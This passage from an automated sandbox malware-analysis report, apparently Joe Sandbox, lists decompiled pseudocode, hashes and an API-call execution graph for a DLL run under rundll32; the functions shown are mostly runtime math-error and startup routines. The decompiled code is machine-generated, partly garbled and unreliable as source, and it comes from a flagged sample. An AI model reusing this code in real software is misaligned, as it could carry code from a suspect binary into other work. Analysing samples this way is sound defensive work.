                0x215206115e0
                0x215206115f7

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: ACP$OCP
                • API String ID: 0-711371036
                • Opcode ID: 2512a34332cc7647f62436d0d6291ed1004cc08f52c024078e6aef40a8a1c94b
                • Instruction ID: 904b942827f46d236c8dcf61ae20da633527aa10e60a51c80b3322378575e524
                • Opcode Fuzzy Hash: 2512a34332cc7647f62436d0d6291ed1004cc08f52c024078e6aef40a8a1c94b
                • Instruction Fuzzy Hash: 4F118173212E61D2FF74D762A4087DAE362AFE4780FA444A1AE069778DEB34E945C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535ED26C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                Download Yara Rule
                C-Code - Quality: 51%
                			E00007FFA7FFA535ED26C(signed int __ecx, void* __r9, signed long long _a16, long long _a32, long long _a40, intOrPtr _a64) {
				signed int _t17;
				signed char _t18;
				void* _t19;
				signed int _t20;
				signed int _t26;
				signed long long _t36;

				_t20 = __ecx;
				asm("movsd [esp+0x8], xmm0");
				asm("movsd [esp+0x68], xmm0");
				_t36 = _a16;
				if ((_t36 & 0x00000000) != 0) goto 0x535ed30c;
				if ((0xffffffff & _t36) == 0) goto 0x535ed2b1;
				goto 0x535f0da0;
				if ((0x00000000 & _t36) == 0) goto 0x535ed30c;
				asm("movsd xmm1, [esp+0x60]");
				r9d = 1;
				asm("xorps xmm0, xmm0");
				_a64 = r9d;
				asm("movsd [esp+0x38], xmm0");
				asm("movsd [esp+0x30], xmm1");
				_a40 = 0x21;
				_a32 = 8;
				_t17 = E00007FFA7FFA535F0B44(_t19, __r9 + 4, 0x00000000 & _t36, 0x53671efc, _t36, 0);
				goto 0x535ed33a;
				_t26 = 0xffffffff & _t36;
				asm("dec eax");
				_t18 = _t17 & 0xffffff00 | _t26 > 0x00000000;
				if ((_t18 & (_t20 & 0xffffff00 | _t26 != 0x00000000)) != 0) goto 0x535ed2c0;
				asm("sqrtsd xmm2, [esp+0x60]");
				asm("movsd [esp+0x70], xmm2");
				asm("movsd xmm0, [esp+0x70]");
				return _t18;
			}









                0x7ffa535ed26c
                0x7ffa535ed26c
                0x7ffa535ed280
                0x7ffa535ed286
                0x7ffa535ed294
                0x7ffa535ed2a3
                0x7ffa535ed2ac
                0x7ffa535ed2be
                0x7ffa535ed2c0
                0x7ffa535ed2cd
                0x7ffa535ed2d3
                0x7ffa535ed2d6
                0x7ffa535ed2e5
                0x7ffa535ed2eb
                0x7ffa535ed2f1
                0x7ffa535ed2fd
                0x7ffa535ed305
                0x7ffa535ed30a
                0x7ffa535ed316
                0x7ffa535ed31c
                0x7ffa535ed321
                0x7ffa535ed326
                0x7ffa535ed328
                0x7ffa535ed32e
                0x7ffa535ed334
                0x7ffa535ed33e

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _handle_error
                • String ID: !$sqrt
                • API String ID: 1757819995-799759792
                • Opcode ID: 729eb5268c35a0980c09cb185ac8c72b798560779506d5a1e1b96fb7e0acc6fb
                • Instruction ID: 4a54b17e134f0adf238fc96ea45de3cbe74dd13ad5ec81118c7a93bf6dbe069b
                • Opcode Fuzzy Hash: 729eb5268c35a0980c09cb185ac8c72b798560779506d5a1e1b96fb7e0acc6fb
                • Instruction Fuzzy Hash: E111B472928F8586DE41CF11A50032A66A6EFDB7E4F24D335EA6C16BC8DF2CE0419B00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F20EB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                Download Yara Rule
                C-Code - Quality: 37%
                			E00007FFA7FFA535F20EB(void* __eax, void* __ecx, void* __rax) {

				asm("rcr dword [ebp+0x816ee0d], 1");
				 *((intOrPtr*)(__rax - 0x7d)) =  *((intOrPtr*)(__rax - 0x7d)) + __ecx;
				asm("loopne 0x5");
				return __eax;
			}



                0x7ffa535f20eb
                0x7ffa535f20f1
                0x7ffa535f20f4
                0x7ffa535f20f6

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _handle_error
                • String ID: !$cos
                • API String ID: 1757819995-1949035351
                • Opcode ID: b51537b2761bdc66e35e25f8c78d2b381d488c5843d727cbe6cb5f4fbf7b3257
                • Instruction ID: 6ccaaf37afb0d8076bee4401a86273a5ef969ac342ab9ffefb74f8d11d3310ef
                • Opcode Fuzzy Hash: b51537b2761bdc66e35e25f8c78d2b381d488c5843d727cbe6cb5f4fbf7b3257
                • Instruction Fuzzy Hash: 9401E1BAA28FC546DA04CF22980036E6162FBDA784F949334EA5D17BC8EB2CD141CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F20F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                Download Yara Rule
                C-Code - Quality: 53%
                			E00007FFA7FFA535F20F8(long long _a8) {
				intOrPtr _v24;
				long long _v48;
				long long _v56;
				void* _t9;
				void* _t10;
				signed long long _t15;

				r8d = 0x12;
				goto 0x535f2120;
				asm("int3");
				asm("int3");
				r8d = 0x1e;
				goto 0x535f2120;
				asm("int3");
				asm("int3");
				asm("movsd [esp+0x60], xmm0");
				_t15 = _a8;
				r10d = r8d;
				asm("movaps xmm1, xmm0");
				if ((_t15 & 0x00000000) != 0) goto 0x535f21b7;
				if ((0xffffffff & _t15) != 0) goto 0x535f21a5;
				r9d = 1;
				_v24 = r9d;
				asm("xorps xmm0, xmm0");
				asm("movsd [esp+0x38], xmm0");
				asm("movsd [esp+0x30], xmm1");
				_v48 = 0x21;
				_v56 = 8;
				_a8 = 0;
				_t9 = E00007FFA7FFA535F0B44(_t10, r10d, 0xffffffff & _t15, 0x53671f04, 0, 0);
				goto 0x535f21b7;
				_a8 = 0xfff8000000000000;
				asm("movsd xmm0, [esp+0x60]");
				return _t9;
			}









                0x7ffa535f20f8
                0x7ffa535f2105
                0x7ffa535f210a
                0x7ffa535f210b
                0x7ffa535f210c
                0x7ffa535f2119
                0x7ffa535f211e
                0x7ffa535f211f
                0x7ffa535f2124
                0x7ffa535f212d
                0x7ffa535f213f
                0x7ffa535f2145
                0x7ffa535f214b
                0x7ffa535f215a
                0x7ffa535f2166
                0x7ffa535f216c
                0x7ffa535f2171
                0x7ffa535f2174
                0x7ffa535f217d
                0x7ffa535f2186
                0x7ffa535f2191
                0x7ffa535f2199
                0x7ffa535f219e
                0x7ffa535f21a3
                0x7ffa535f21b2
                0x7ffa535f21b7
                0x7ffa535f21c1

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _ctrlfp_handle_error_raise_exc
                • String ID: !$cos
                • API String ID: 3384550415-1949035351
                • Opcode ID: edee88c7394a9a8d8abb3cd62ee3fdd2bcd9f50bfb018f013d89ef7671a95121
                • Instruction ID: b98486cbb7c7ad8c95903bcf641d360f1fde733240f316f09a453ba1c0808dd3
                • Opcode Fuzzy Hash: edee88c7394a9a8d8abb3cd62ee3fdd2bcd9f50bfb018f013d89ef7671a95121
                • Instruction Fuzzy Hash: C501D2B6A28FC446DA10CF22A80037A6162FBDA7C4F509334EA4D17B88EF3CE151CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F210C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                Download Yara Rule
                C-Code - Quality: 56%
                			E00007FFA7FFA535F210C(long long _a8) {
				intOrPtr _v24;
				long long _v48;
				long long _v56;
				void* _t9;
				void* _t10;
				signed long long _t15;

				r8d = 0x1e;
				goto 0x535f2120;
				asm("int3");
				asm("int3");
				asm("movsd [esp+0x60], xmm0");
				_t15 = _a8;
				r10d = r8d;
				asm("movaps xmm1, xmm0");
				if ((_t15 & 0x00000000) != 0) goto 0x535f21b7;
				if ((0xffffffff & _t15) != 0) goto 0x535f21a5;
				r9d = 1;
				_v24 = r9d;
				asm("xorps xmm0, xmm0");
				asm("movsd [esp+0x38], xmm0");
				asm("movsd [esp+0x30], xmm1");
				_v48 = 0x21;
				_v56 = 8;
				_a8 = 0;
				_t9 = E00007FFA7FFA535F0B44(_t10, r10d, 0xffffffff & _t15, 0x53671f04, 0, 0);
				goto 0x535f21b7;
				_a8 = 0xfff8000000000000;
				asm("movsd xmm0, [esp+0x60]");
				return _t9;
			}









                0x7ffa535f210c
                0x7ffa535f2119
                0x7ffa535f211e
                0x7ffa535f211f
                0x7ffa535f2124
                0x7ffa535f212d
                0x7ffa535f213f
                0x7ffa535f2145
                0x7ffa535f214b
                0x7ffa535f215a
                0x7ffa535f2166
                0x7ffa535f216c
                0x7ffa535f2171
                0x7ffa535f2174
                0x7ffa535f217d
                0x7ffa535f2186
                0x7ffa535f2191
                0x7ffa535f2199
                0x7ffa535f219e
                0x7ffa535f21a3
                0x7ffa535f21b2
                0x7ffa535f21b7
                0x7ffa535f21c1

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _ctrlfp_handle_error_raise_exc
                • String ID: !$sin
                • API String ID: 3384550415-1565623160
                • Opcode ID: 361b00e162a6c88b8351d59fb4018f7250c35803a1d3775a8525240e4db19aae
                • Instruction ID: 9f0fe626548f1c3974b523ed01bc2dc534fb9964156baa372bca17854b060a4e
                • Opcode Fuzzy Hash: 361b00e162a6c88b8351d59fb4018f7250c35803a1d3775a8525240e4db19aae
                • Instruction Fuzzy Hash: 0D01F5B6A28FC445D610CF12980037A6162BFDB7C4F509324EA4D16B88EF7CD141CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F3550 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                Download Yara Rule
                C-Code - Quality: 53%
                			E00007FFA7FFA535F3550(void* __eflags, void* __r8, signed long long _a32) {
				long long _v40;
				long long _v64;
				long long _v72;
				intOrPtr _t10;
				void* _t11;
				void* _t12;
				void* _t13;
				intOrPtr* _t17;
				intOrPtr* _t20;

				_t21 = __r8;
				_t17 = _t20;
				asm("movaps [eax-0x18], xmm6");
				asm("movaps xmm6, xmm1");
				asm("movaps xmm2, xmm0");
				r8d = r8d - 2;
				if (__eflags == 0) goto 0x535f3592;
				if (r8d != 1) goto 0x535f35ea;
				 *((intOrPtr*)(_t17 - 0x28)) = r8d;
				_t2 = _t21 + 2; // 0x200000001
				r9d = _t2;
				asm("xorps xmm1, xmm1");
				asm("movss [eax-0x30], xmm1");
				asm("movss [eax-0x38], xmm2");
				 *((long long*)(_t17 - 0x40)) = 0x22;
				 *((long long*)(_t17 - 0x48)) = 0x11;
				goto 0x535f35bf;
				_v40 = 1;
				asm("xorps xmm0, xmm0");
				asm("movss [esp+0x38], xmm0");
				r9d = 4;
				asm("movss [esp+0x30], xmm2");
				_v64 = 0x22;
				_v72 = 0x12;
				_a32 = _a32 & 0x00000000;
				asm("movss [esp+0x88], xmm6");
				 *_t17 = _t10;
				 *_t17 =  *_t17 + _t10;
				_t11 = E00007FFA7FFA535F0C6C(_t12, _t13,  *_t17, 0x53678540, 0x14, __r8);
				asm("movaps xmm0, xmm6");
				asm("movaps xmm6, [esp+0x50]");
				return _t11;
			}












                0x7ffa535f3550
                0x7ffa535f3550
                0x7ffa535f3557
                0x7ffa535f355b
                0x7ffa535f355e
                0x7ffa535f3561
                0x7ffa535f3565
                0x7ffa535f356b
                0x7ffa535f356d
                0x7ffa535f3571
                0x7ffa535f3571
                0x7ffa535f3575
                0x7ffa535f3578
                0x7ffa535f357d
                0x7ffa535f3582
                0x7ffa535f3589
                0x7ffa535f3590
                0x7ffa535f3592
                0x7ffa535f359a
                0x7ffa535f359d
                0x7ffa535f35a3
                0x7ffa535f35a9
                0x7ffa535f35af
                0x7ffa535f35b7
                0x7ffa535f35bf
                0x7ffa535f35cf
                0x7ffa535f35e1
                0x7ffa535f35e3
                0x7ffa535f35e5
                0x7ffa535f35ea
                0x7ffa535f35ed
                0x7ffa535f35f6

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _handle_errorf
                • String ID: "$expf
                • API String ID: 2315412904-303238936
                • Opcode ID: ecdfa100b0e40134a013d6faf908fb403a36dbfd93a5c1f1fd6f413ea569dd35
                • Instruction ID: 3ca24db9f424951db9495ff09cb59ca0f26dd413ffadfcd395ce1a0a0d2c5c56
                • Opcode Fuzzy Hash: ecdfa100b0e40134a013d6faf908fb403a36dbfd93a5c1f1fd6f413ea569dd35
                • Instruction Fuzzy Hash: FD017372938BC486E331CB21D0893AAB761FBE6344F649315E348266A0CF7DD495DB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205914C0 Relevance: 5.1, APIs: 4, Instructions: 99COMMON
                Download Yara Rule
                C-Code - Quality: 16%
                			E00000215215205914C0(long long __rbx, long long __rcx, intOrPtr* __rdx, long long* __r8, void* __r9) {
				void* _t28;
				long long _t48;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t64;
				intOrPtr _t74;
				intOrPtr _t76;
				long long _t80;
				void* _t83;

				 *((long long*)(_t83 + 0x20)) = 0xfffffffe;
				 *((long long*)(_t83 + 0x68)) = __rbx;
				 *((long long*)(_t83 + 0x70)) = _t80;
				 *((long long*)(_t83 + 0x28)) = __rcx;
				EnterCriticalSection(??);
				 *((char*)(_t83 + 0x30)) = 1;
				_t74 =  *((intOrPtr*)(__rcx + 0x30));
				if (_t74 == 0) goto 0x2059154b;
				_t48 =  *((intOrPtr*)(_t74 + 0x10));
				if (_t48 == 0) goto 0x2059151c;
				_t58 =  *((intOrPtr*)(__rdx + 8));
				if (_t58 == 0) goto 0x2059151c;
				if (_t48 == _t58) goto 0x205915f0;
				if ( *((intOrPtr*)(_t74 + 8)) == 0) goto 0x20591542;
				if ( *__rdx == 0) goto 0x20591542;
				if (E00000215215205F781C( *((intOrPtr*)(_t74 + 8)) + 8,  *__rdx + 8) == 0) goto 0x205915f0;
				if ( *((intOrPtr*)(_t74 + 0x20)) != 0) goto 0x20591501;
				LeaveCriticalSection(??);
				 *((char*)(_t83 + 0x30)) = 0;
				 *__r8();
				_t55 = _t48;
				 *((long long*)(_t83 + 0x60)) = _t48;
				asm("movups xmm0, [esi]");
				asm("movups [eax+0x8], xmm0");
				EnterCriticalSection(??);
				 *((char*)(_t83 + 0x30)) = 1;
				_t76 =  *((intOrPtr*)(__rcx + 0x30));
				if (_t76 == 0) goto 0x205915c7;
				_t49 =  *((intOrPtr*)(_t76 + 0x10));
				if (_t49 == 0) goto 0x2059159c;
				_t64 =  *((intOrPtr*)(__rdx + 8));
				if (_t64 == 0) goto 0x2059159c;
				if (_t49 == _t64) goto 0x205915dd;
				if ( *((intOrPtr*)(_t76 + 8)) == 0) goto 0x205915be;
				if ( *__rdx == 0) goto 0x205915be;
				if (E00000215215205F781C( *((intOrPtr*)(_t76 + 8)) + 8,  *__rdx + 8) == 0) goto 0x205915dd;
				if ( *((intOrPtr*)(_t76 + 0x20)) != 0) goto 0x20591585;
				 *((long long*)(_t55 + 0x20)) =  *((intOrPtr*)(__rcx + 0x30));
				 *((long long*)(__rcx + 0x30)) = _t55;
				 *((long long*)(_t83 + 0x60)) = _t55;
				if (_t55 == 0) goto 0x205915f0;
				_t28 =  *((intOrPtr*)( *_t55))();
				LeaveCriticalSection(??);
				return _t28;
			}













                0x215205914c9
                0x215205914d2
                0x215205914d7
                0x215205914e8
                0x215205914ed
                0x215205914f3
                0x215205914f8
                0x215205914ff
                0x21520591501
                0x21520591508
                0x2152059150a
                0x21520591511
                0x21520591516
                0x21520591523
                0x2152059152b
                0x2152059153c
                0x21520591549
                0x2152059154e
                0x21520591554
                0x2152059155c
                0x2152059155f
                0x21520591562
                0x21520591567
                0x2152059156a
                0x21520591571
                0x21520591577
                0x2152059157c
                0x21520591583
                0x21520591585
                0x2152059158c
                0x2152059158e
                0x21520591595
                0x2152059159a
                0x215205915a3
                0x215205915ab
                0x215205915bc
                0x215205915c5
                0x215205915cb
                0x215205915d2
                0x215205915d8
                0x215205915e0
                0x215205915ed
                0x215205915f3
                0x2152059160e

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CriticalSection$EnterLeave
                • String ID:
                • API String ID: 3168844106-0
                • Opcode ID: 6c6d2242197f0821451c108ba304f23390c731718bc14dbbf7516e377325aafc
                • Instruction ID: e2e06662c7804ac0d254b7c827ac1ffe5a2ef07cbec03f41c8a076a1f783aee5
                • Opcode Fuzzy Hash: 6c6d2242197f0821451c108ba304f23390c731718bc14dbbf7516e377325aafc
                • Instruction Fuzzy Hash: AB419277302FA4C6EE658F16A5887996361FFE4BD0F1A81649E9B07B8CDF38D4408B44
                Uniqueness

                Uniqueness Score: -1.00%

                Execution Graph

                Execution Coverage:2.3%
                Dynamic/Decrypted Code Coverage:0.1%
                Signature Coverage:0%
                Total number of Nodes:835
                Total number of Limit Nodes:23
                execution_graph 55901 285c80dada0 55902 285c80dadc6 GetModuleHandleW 55901->55902 55905 285c80dae10 abort 55901->55905 55902->55905 55908 285c80dadd3 55902->55908 55903 285c80daebf abort 55906 285c80daef1 55903->55906 55907 285c80daee8 55903->55907 55904 285c80dae94 55909 285c80daeac 55904->55909 55920 285c80dbcec 55904->55920 55905->55903 55905->55904 55916 285c80dba98 55905->55916 55925 285c80daf0c 7 API calls 55907->55925 55908->55905 55919 285c80daf58 GetModuleHandleExW try_get_function __scrt_initialize_thread_safe_statics 55908->55919 55911 285c80dbcec 28 API calls 55909->55911 55911->55903 55926 285c80db70c 55916->55926 55918 285c80dbacd 55918->55904 55919->55905 55921 285c80dbd47 55920->55921 55922 285c80dbd28 55920->55922 55921->55909 55922->55921 55933 285c805607c 55922->55933 55936 285c8055910 55922->55936 55929 285c80db735 abort 55926->55929 55927 285c80db741 abort 55927->55918 55928 285c80db7c4 55928->55927 55932 285c80da780 11 API calls 2 library calls 55928->55932 55929->55927 55929->55928 55931 285c80db825 TlsFree 55929->55931 55931->55929 55932->55927 55941 285c80a12f4 55933->55941 55935 285c805608c 55982 285c80c51cc 55936->55982 55939 285c805594b 55939->55922 55940 285c8055937 WSAStartup 55940->55939 55944 285c80a10d8 55941->55944 55943 285c80a133b __std_exception_destroy 55943->55935 55945 285c80a113a shared_ptr 55944->55945 55946 285c80a11b5 55945->55946 55947 285c80a1196 55945->55947 55951 285c80a09d0 55946->55951 55956 285c80a0a5c 25 API calls 3 library calls 55947->55956 55950 285c80a11b0 55950->55943 55957 285c80a15b8 55951->55957 55954 285c80a0a2b _Ptr_base 55954->55950 55956->55950 55958 285c80a15e8 55957->55958 55959 285c80a0a08 55958->55959 55966 285c80cb034 23 API calls 2 library calls 55958->55966 55959->55954 55962 285c80a0950 55959->55962 55963 285c80a09a1 __ExceptionPtr::__ExceptionPtr 55962->55963 55965 285c80a09be 55963->55965 55967 285c80a0af8 55963->55967 55965->55954 55969 285c80a0b45 __ExceptionPtr::__ExceptionPtr 55967->55969 55968 285c80a0c73 55981 285c80cb034 23 API calls 2 library calls 55968->55981 55969->55968 55972 285c80a0be4 EncodePointer 55969->55972 55977 285c80a0c1e __ExceptionPtr::_CallCopyCtor 55969->55977 55974 285c80a0c11 55972->55974 55978 285c80a0c0a std::bad_alloc::bad_alloc 55972->55978 55976 285c80a15b8 _StaticAlloc 23 API calls 55974->55976 55976->55978 55977->55965 55978->55977 55980 285c80c9940 RaiseException shared_ptr 55978->55980 55980->55968 55985 285c80c517c 55982->55985 55984 285c8055923 55984->55939 55984->55940 55986 285c80c51ab 55985->55986 55988 285c80c51a1 _onexit 55985->55988 55989 285c80dbb14 13 API calls _onexit 55986->55989 55988->55984 55989->55988 55990 285c80c4e90 55997 285c80c9b2c 55990->55997 55994 285c80c4e9d 56006 285c80ca260 55997->56006 56000 285c80dbca4 56034 285c80dc3c8 GetLastError 56000->56034 56003 285c80c9b40 56058 285c80ca1f4 56003->56058 56007 285c80ca27f GetLastError 56006->56007 56008 285c80c4e99 56006->56008 56022 285c80c9ff0 LoadLibraryExW GetLastError LoadLibraryExW TlsGetValue try_get_function 56007->56022 56008->55994 56008->56000 56010 285c80ca2fd SetLastError 56010->56008 56011 285c80ca292 56011->56010 56012 285c80ca2a2 56011->56012 56023 285c80ca044 LoadLibraryExW GetLastError LoadLibraryExW TlsSetValue try_get_function 56011->56023 56012->56010 56014 285c80ca2b2 56014->56010 56024 285c80d7c38 56014->56024 56017 285c80ca2d9 56020 285c80ca2ea 56017->56020 56031 285c80ca044 LoadLibraryExW GetLastError LoadLibraryExW TlsSetValue try_get_function 56017->56031 56032 285c80da780 11 API calls 2 library calls 56020->56032 56022->56011 56023->56014 56029 285c80d7c49 __vcrt_getptd_noexit new 56024->56029 56025 285c80d7c9a 56033 285c80d3944 11 API calls _get_daylight 56025->56033 56026 285c80d7c7e HeapAlloc 56027 285c80ca2c3 56026->56027 56026->56029 56027->56017 56030 285c80ca044 LoadLibraryExW GetLastError LoadLibraryExW TlsSetValue try_get_function 56027->56030 56029->56025 56029->56026 56030->56017 56031->56020 56032->56010 56033->56027 56035 285c80dc3ec 56034->56035 56036 285c80dc3f1 56034->56036 56053 285c80dc9f4 LoadLibraryExW GetLastError LoadLibraryExW TlsGetValue __vcrt_uninitialize_ptd 56035->56053 56038 285c80d7c38 __vcrt_getptd_noexit 8 API calls 56036->56038 56040 285c80dc43a 56036->56040 56039 285c80dc408 56038->56039 56041 285c80dc410 56039->56041 56055 285c80dca4c LoadLibraryExW GetLastError LoadLibraryExW TlsSetValue __vcrt_uninitialize_ptd 56039->56055 56043 285c80dc43f SetLastError 56040->56043 56044 285c80dc449 SetLastError 56040->56044 56054 285c80da780 11 API calls 2 library calls 56041->56054 56047 285c80c4ea6 56043->56047 56044->56047 56046 285c80dc427 56046->56041 56049 285c80dc42e 56046->56049 56047->55994 56047->56003 56048 285c80dc417 56048->56043 56056 285c80dc0a0 11 API calls _get_daylight 56049->56056 56051 285c80dc433 56057 285c80da780 11 API calls 2 library calls 56051->56057 56053->56036 56054->56048 56055->56046 56056->56051 56057->56040 56059 285c80c9b4b 56058->56059 56060 285c80ca208 56058->56060 56059->55994 56061 285c80ca212 56060->56061 56066 285c80c9ff0 LoadLibraryExW GetLastError LoadLibraryExW TlsGetValue try_get_function 56060->56066 56067 285c80ca044 LoadLibraryExW GetLastError LoadLibraryExW TlsSetValue try_get_function 56061->56067 56064 285c80ca222 56064->56059 56068 285c80da780 11 API calls 2 library calls 56064->56068 56066->56061 56067->56064 56068->56059 56069 285c80c582c 56070 285c80c5852 56069->56070 56071 285c80c5889 56070->56071 56072 285c80c5869 dllmain_raw 56070->56072 56074 285c80c585a 56070->56074 56071->56074 56122 285c805c180 56071->56122 56072->56074 56075 285c80c587c 56072->56075 56086 285c80c562c 56075->56086 56077 285c80c58a0 56078 285c80c58d6 56077->56078 56079 285c805c180 23 API calls 56077->56079 56078->56074 56080 285c80c562c 47 API calls 56078->56080 56081 285c80c58bc 56079->56081 56082 285c80c58ec 56080->56082 56084 285c80c562c 47 API calls 56081->56084 56082->56074 56083 285c80c58f6 dllmain_raw 56082->56083 56083->56074 56085 285c80c58c9 dllmain_raw 56084->56085 56085->56078 56087 285c80c5634 56086->56087 56097 285c80c566d __scrt_acquire_startup_lock 56086->56097 56088 285c80c5661 56087->56088 56089 285c80c5639 56087->56089 56140 285c80c4f78 56088->56140 56090 285c80c5654 __scrt_dllmain_crt_thread_attach 56089->56090 56091 285c80c563e 56089->56091 56092 285c80c5652 56090->56092 56094 285c80c5643 56091->56094 56135 285c80c4eb8 56091->56135 56092->56071 56094->56071 56096 285c80c57f1 56158 285c80c4f34 56096->56158 56097->56096 56108 285c80c57c6 56097->56108 56151 285c80c5dd8 IsProcessorFeaturePresent 56097->56151 56100 285c80c57f6 56163 285c80c4f64 8 API calls __vcrt_uninitialize_ptd 56100->56163 56102 285c80c569e __scrt_acquire_startup_lock 56103 285c80c56ca 56102->56103 56105 285c80c5dd8 __scrt_fastfail 5 API calls 56102->56105 56114 285c80c56a2 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 56102->56114 56146 285c80c4e78 56103->56146 56104 285c80c5801 __scrt_release_startup_lock 56164 285c80c5150 4 API calls 2 library calls 56104->56164 56105->56103 56108->56071 56109 285c80c56d9 _RTC_Initialize 56110 285c80c51cc __scrt_initialize_thread_safe_statics 13 API calls 56109->56110 56109->56114 56111 285c80c56ee 56110->56111 56149 285c80c5fcc InitializeSListHead 56111->56149 56113 285c80c56f3 56115 285c80c51cc __scrt_initialize_thread_safe_statics 13 API calls 56113->56115 56114->56071 56116 285c80c56ff 56115->56116 56117 285c80dbd64 12 API calls 56116->56117 56118 285c80c5717 56117->56118 56118->56114 56119 285c80c571b __scrt_dllmain_after_initialize_c 56118->56119 56119->56114 56120 285c80c5724 56119->56120 56121 285c80dbcec 28 API calls 56120->56121 56121->56114 56123 285c805c2e8 56122->56123 56124 